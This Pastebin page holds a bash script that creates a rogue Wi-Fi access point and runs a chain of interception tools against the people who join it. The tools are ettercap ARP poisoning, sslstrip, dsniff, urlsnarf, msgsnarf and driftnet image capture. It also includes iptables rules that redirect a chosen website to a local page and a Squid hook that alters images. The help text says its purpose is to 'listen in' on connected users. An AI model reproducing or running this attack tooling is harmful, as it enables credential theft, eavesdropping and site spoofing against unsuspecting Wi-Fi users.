Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Colored dialogs
- GREEN="\033[1;32m"
- RED="\033[1;31m"
- END="\033[1;37m"
- clear
- echo -e "For this to run please ensue that you know what "
- echo 'card is connected to the internet'
- echo 'and what card is in Monitor mode'
- echo
- # Download and install Apache2 only if it isn't installed
- if [ -f /usr/sbin/apache2 ] && [ -f /usr/sbin/apache2ctl ];then
- echo -e ""$GREEN"Apache2 (Web server) found in your system"$END""
- echo;else
- echo -e ""$RED"Installing Apache2 - Web server"$END""
- apt-get install -y apache2 apache2-mpm-prefork apache2.2-common
- echo
- # apache2 2.2.9-7ubuntu3.2 [45.1kB]
- # apache2.2-common 2.2.9-7ubuntu3.2 [778kB]
- # apache2-mpm-prefork 2.2.9-7ubuntu3.2 [236kB]
- fi
- # Download and install Mogrify only if it isn't installed
- if [ -f /usr/bin/mogrify ];then
- echo -e ""$GREEN"ImageMagick's Mogrify found in your system"$END"";else
- echo -e ""$RED"Installing ImageMagick"$END""
- apt-get install -y imagemagick
- fi
- # Download and install Squid3 only if it isn't installed
- if [ -f /usr/sbin/squid3 ];then
- echo -e ""$GREEN"Squid3 (Proxy caching server for web clients)"
- echo -e "found in your system"$END""
- echo;else
- echo -e ""$RED"Installing Squid3 - Proxy caching server for web clients"$END""
- apt-get install -y squid3 squid3-common
- # squid3-common 3.0.STABLE7-1ubuntu1 [225kB]
- # squid3 3.0.STABLE7-1ubuntu1 [873kB]
- fi
- echo 'Setting up the folders...'
- echo
- export HOME_DIR="/root/Fake_AP"
- export TMP_DIR="/root/Fake_AP/tmp/"
- export DAY_DIR=$HOME_DIR"/$(date +%d-%m-%y_%T)"
- export REDIR="off"
- # Making working and backup directory
- if [ ! -d $HOME_DIR ];then
- mkdir $HOME_DIR
- mkdir $TMP_DIR
- fi
- touch /var/run/dhcpd.pid && chmod 777 /var/run/dhcpd.pid
- mkdir $DAY_DIR
- mkdir $DAY_DIR"/DriftNet"
- mkdir $DAY_DIR"/Dsniff"
- mkdir $DAY_DIR"/Ettercap"
- mkdir $DAY_DIR"/SslStrip"
- echo -n "Enter the name of the wireless card that is connected to the internet, for example:- wlan0: "
- read -e wlan
- export GATEWAY="`/sbin/route | grep 'default'| awk '{print $2}'`"
- export IPADD="`/sbin/ifconfig $wlan| grep 'inet addr' | awk '{print $2}' | sed -e 's/.*://'`"
- echo -n "Enter the name of the wireless card that is in monitor mode, for example:- ath0: "
- read -e MON
- echo -n "Enter the ESSID you would like your rogue AP to be called, for example:- Free WiFi: "
- read -e AP
- modprobe tun
- #airbase-ng is going to create our fake AP with the SSID we specified
- xterm -bg black -fg yellow -e airbase-ng -c 6 -e "$AP" $mon &
- sleep 3
- echo Configuring interface created by airdrop-ng
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface...'
- echo
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
- echo 'Creating a dhcpd.conf to assign addresses to clients that connect to us...'
- echo
- echo "default-lease-time 600;" > $HOME_DIR/dhcpd.conf
- echo "max-lease-time 720;" >> $HOME_DIR/dhcpd.conf
- echo "ddns-update-style none;" >> $HOME_DIR/dhcpd.conf
- echo "authoritative;" >> $HOME_DIR/dhcpd.conf
- echo "log-facility local7;" >> $HOME_DIR/dhcpd.conf
- echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> $HOME_DIR/dhcpd.conf
- echo "range 10.0.0.100 10.0.0.254;" >> $HOME_DIR/dhcpd.conf
- echo "option routers 10.0.0.1;" >> $HOME_DIR/dhcpd.conf
- echo "option domain-name-servers $GATEWAY;" >> $HOME_DIR/dhcpd.conf
- echo "}" >> $HOME_DIR/dhcpd.conf
- echo 'DHCP server starting on our airdrop-ng interface (at0)'
- echo
- xterm -bg black -fg blue -e dhcpd3 -f -cf $HOME_DIR/dhcpd.conf at0 &
- echo "Launching DHCP entries log"
- echo
- xterm -bg black -fg red -e tail -f /var/log/messages &
- echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
- echo
- xterm -bg black -fg white -e ettercap -T -q -p -l $DAY_DIR/Ettercap/ettercap -i at0 // // &
- sleep 8
- echo 'Configuring ip forwarding'
- echo
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo 'Launching various tools'
- xterm -rightbar -bg black -fg green -e sslstrip -a -k -f --write $DAY_DIR/SslStrip/ssl.log &
- xterm -rightbar -bg black -fg green -e urlsnarf -i at0 &
- xterm -rightbar -bg black -fg green -e dsniff -m -i at0 -d -w $DAY_DIR/Dsniff/dsniff.log &
- sleep 5
- echo
- showMenu () {
- clear
- echo
- echo ""
- echo -e " Fake AP Name: ""$RED"$AP"$END"
- echo -e " IP Address: "$RED"$IPADD""$END"
- echo -e " Gateway: "$RED"$GATEWAY""$END"
- if [ "$REDIR" == "on" ];then
- echo -e " $website being redirected to /Var/www/index.html"
- fi
- echo ""
- echo ""
- echo " 1) Read Ettercap Log"
- echo " 2) Read DSniff Log"
- echo " 3) Start MSN Logger"
- echo " 4) Start DriftNet"
- if [ "$REDIR" == "off" ];then
- echo " 5) Redirect"
- elif [ "$REDIR" == "on" ];then
- echo " 5) Turn Redirect Off"
- fi
- echo " 6) Flip Images Upside down"
- echo " 7) Help"
- echo " 8) Exit"
- echo
- }
- while [ 1 ]
- do
- showMenu
- read CHOICE
- case "$CHOICE" in
- "1")
- echo "Loading up the Ettercap Log";
- konsole --noclose -T "Etterlog" -e etterlog -p $DAY_DIR/Ettercap/ettercap.eci
- ;;
- "2")
- echo "Loading up the DSniff Log";
- konsole --noclose -T "DSniff" -e dsniff -r $DAY_DIR/Dsniff/dsniff.log
- ;;
- "3")
- xterm -T "IM Chat" -e msgsnarf -i at0 &
- ;;
- "4")
- xterm -rightbar -bg black -fg green -e driftnet -v -a -i at0 -d $TMP_DIR/ &
- ;;
- "5")
- if [ "$REDIR" == "off" ];then
- clear
- echo -n "Enter the Website to set as target: "
- read -e website
- iptables -t nat -A PREROUTING -p tcp -d $website --dport 80 -j DNAT --to 10.0.0.1:80
- /etc/init.d/apache2 start
- export REDIR="on"
- echo ""
- echo "Done..."
- echo ""
- echo "All requests for $website will now be redirected to 10.0.0.1/index.html"
- sleep 5
- elif [ "$REDIR" == "on" ];then
- /etc/init.d/apache2 stop
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
- export REDIR="off"
- fi
- ;;
- "6")
- cat > /usr/local/bin/redirect.pl << "EOF"
- #!/usr/bin/perl
- $|=1;
- $count = 0;
- $pid = $$;
- while (<>) {
- chomp $_;
- if ($_ =~ /(.*\.jpg)/i) {
- $url = $1;
- system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.jpg", "$url");
- system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.jpg");
- print "http://10.0.0.1/images/$pid-$count.jpg\n";
- }
- elsif ($_ =~ /(.*\.gif)/i) {
- $url = $1;
- system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.gif", "$url");
- system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.gif");
- print "http://10.0.0.1/images/$pid-$count.gif\n";
- }
- elsif ($_ =~ /(.*\.png)/i) {
- $url = $1;
- system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.png", "$url");
- system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.png");
- print "http://10.0.0.1/images/$pid-$count.png\n";
- }
- elsif ($_ =~ /(.*\.bmp)/i) {
- $url = $1;
- system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.bmp", "$url");
- system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.bmp");
- print "http://10.0.0.1/images/$pid-$count.bmp\n";
- }
- else {
- print "$_\n";;
- }
- $count++;
- }
- EOF
- # Make it executable
- chmod 755 /usr/local/bin/redirect.pl
- if [ ! -d /var/www/images ];then
- mkdir /var/www/images
- chown -R www-data:www-data /var/www
- chmod -R 1777 /var/www
- usermod -aG proxy www-data;else
- rm /var/www/images/*
- fi
- sed '39s%.*%url_rewrite_program /usr/local/bin/redirect.pl%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf
- sed '40s%.*%redirect_children 12%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf
- /etc/init.d/apache2 start
- /etc/init.d/squid3 start
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables --table nat --append POSTROUTING --out-interface $wlan -j MASQUERADE
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $IPADD
- #Transparent Squid3
- iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1:3128
- iptables -t nat -A PREROUTING -i $wlan -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
- ;;
- "7") # Instructions
- clear
- echo "Instructions"
- echo ""
- echo "This utility is used to create a Fake Access Point."
- echo "it will allow others to connect to the internet through you"
- echo "and allow you to listen in to what they are up to"
- echo ""
- echo "Once it has been run, it will create a new folder at /root/"
- echo "in there it will create a DHCPD.CONF file,A TMP directory for the storage"
- echo "of images from DRIFTNET and a working directoy named with the date and time"
- echo "of the start of the program. when you close the script all images from TMP"
- echo "will be moved into the relavant working directory. this is also where all"
- echo "logs are saved"
- echo ""
- echo "Requirments:-"
- echo "1) You will need to be connected to the internet,either by Lan or Wireless"
- echo "2) Have another wireless card already set in monitor mode"
- echo ""
- echo "How To:-"
- echo "If you are reading this then you should already have the basics set up"
- echo "That being a Fake AP set up with a name of your choice"
- echo "You should be able to have clients connect to it and be issued a IP address"
- echo "There should also be a number of Xterm windows showing different statistics"
- echo "I.e. anything being reported by SSLSTRIP,DSNIFF,URLSNARF,ETTERCAP and DHCP Requests"
- echo ""
- echo "Along with these instructions on the menu, there is options to read the ouput"
- echo "from the Ettercap and Dsniff programs"
- echo ""
- echo "To start MSGSNARF to listen into various chat programs, although im sure this has"
- echo "been set up correctly i have not managed to sniff anything yet"
- echo ""
- echo "DRIFTNET has been included, All images are automatically saved to the TMP folder"
- echo "and moved to the working directory on closure of the script."
- echo ""
- echo "To enable routing."
- echo "Once selected it will ask you for a target website. it will then load up Apache2"
- echo "and redirect any traffic thats destined for the target website to 10.0.0.1. you will"
- echo "you will have to make sure that you have an index.html page in there for it to work "
- echo "or it will come up with a 404 page not found error. I am still working on how to send"
- echo "all traffic to that address, as in a Captive Portal setup"
- echo ""
- echo "Press any key to continue"
- echo -n
- read
- ;;
- "8")
- echo "******************************************************************";
- echo "*******Now Shutting Down All Windows********";
- echo "*************And saving logs****************";
- echo "******************************************************************";
- mv $TMP_DIR*.* $DAY_DIR/DriftNet/
- sleep 3
- #stop the APACHE server
- /etc/init.d/apache2 stop
- #stop squid
- /etc/init.d/squid3 stop
- # reset all IPTABLES
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
- sleep 3
- killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm ;
- exit 0
- ;;
- esac
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement